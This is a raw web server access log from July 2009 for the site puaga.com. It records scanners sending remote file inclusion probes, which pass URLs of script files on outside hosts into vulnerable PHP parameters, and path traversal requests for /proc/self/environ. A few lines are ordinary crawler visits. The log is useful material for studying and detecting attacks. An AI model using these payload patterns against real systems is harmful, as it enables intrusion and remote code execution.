207.210.89.18 - - [05/Jul/2009:10:05:35 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:05:35 -0700] "GET /logs/access_090620.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:05:35 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:05:35 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/access_090614.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/access_090614.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/access_090614.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/access_090614.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:06:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
220.181.7.85 - - [05/Jul/2009:10:06:29 -0700] "GET /orange_g/forum/viewtopic.php?p=28715 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
195.34.78.110 - - [05/Jul/2009:10:07:16 -0700] "GET /logs/access_090619.log//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:07:35 -0700] "GET /logs/access_090614.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:07:35 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:07:35 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:07:36 -0700] "GET /shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:07:36 -0700] "GET /logs//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:07:36 -0700] "GET /logs/access_090619.log//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:09:42 -0700] "GET /logs/access_090620.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:09:42 -0700] "GET /logs/access_090620.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:09:42 -0700] "GET /logs/access_090620.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:09:42 -0700] "GET /logs/access_090620.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
72.30.81.168 - - [05/Jul/2009:10:09:46 -0700] "GET /new/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
72.30.81.168 - - [05/Jul/2009:10:09:47 -0700] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/new/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
72.30.81.168 - - [05/Jul/2009:10:09:48 -0700] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/new/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
218.234.21.178 - - [05/Jul/2009:10:10:18 -0700] "GET /logs/access_090620.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:10:49 -0700] "GET /logs/access_090517.log///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:10:49 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:10:49 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:11:21 -0700] "GET /logs/access_090517.log///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:11:21 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:11:21 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:11:59 -0700] "GET /?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:11:59 -0700] "GET /logs//?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:12:21 -0700] "GET /logs/access_090610.log%20%20//?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:15:30 -0700] "GET /logs//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:15:30 -0700] "GET /logs/access_090619.log%20%20//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:15:30 -0700] "GET /shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:15:31 -0700] "GET /logs/access_090510.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:15:34 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:15:36 -0700] "GET /logs/access_090514.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:15:37 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:33 -0700] "GET /shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:33 -0700] "GET /logs//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:33 -0700] "GET /logs/access_090619.log%20%20//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:36 -0700] "GET /shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:36 -0700] "GET /logs//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:16:37 -0700] "GET /logs/access_090619.log%20%20//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:17:56 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:18:17 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:19:20 -0700] "GET /logs/access_090514.log//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:20:26 -0700] "GET /logs/access_090602.log///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:10:22:02 -0700] "GET /logs/access_090602.log///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:10:24:39 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:25:04 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:09 -0700] "GET /logs/home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:09 -0700] "GET /logs/access_090613.log/home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:09 -0700] "GET /home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:25:11 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:25:11 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:25:14 -0700] "GET /logs/access_090616.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:25:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:25:15 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:25:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:25:16 -0700] "GET /logs/access_090611.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:16 -0700] "GET /logs/access_090623.log/home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:25:26 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:25:28 -0700] "GET /logs/access_090616.log//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:25:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:25:28 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:50 -0700] "GET /logs/access_090613.log%20%20/home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.147.29.190 - - [05/Jul/2009:10:25:50 -0700] "GET /logs/access_090623.log%20%20/home.php?pagina=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:26:05 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:26:05 -0700] "GET /logs/access_090616.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:26:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:26:20 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:26:20 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:26:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:26:20 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:26:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:26:23 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:26:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:26:29 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:27:23 -0700] "GET /logs/access_090619.log//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:27:51 -0700] "GET /logs/access_090619.log//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:27:54 -0700] "GET /logs/access_090616.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:28:01 -0700] "GET /logs/access_090606.log//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:10:28:11 -0700] "GET /logs/access_090619.log//shop/main.php?_shop_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:29:09 -0700] "GET /logs/access_090622.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:29:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:29:10 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:29:16 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:29:16 -0700] "GET /logs/access_090616.log//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:29:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:29:20 -0700] "GET /logs/access_090614.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:30:05 -0700] "GET /logs/access_090529.log%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:30:22 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:30:22 -0700] "GET /logs/access_090622.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:30:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:30:32 -0700] "GET /logs/access_090614.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:30:47 -0700] "GET /logs/access_090524.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:30:55 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:30:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:10:30:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
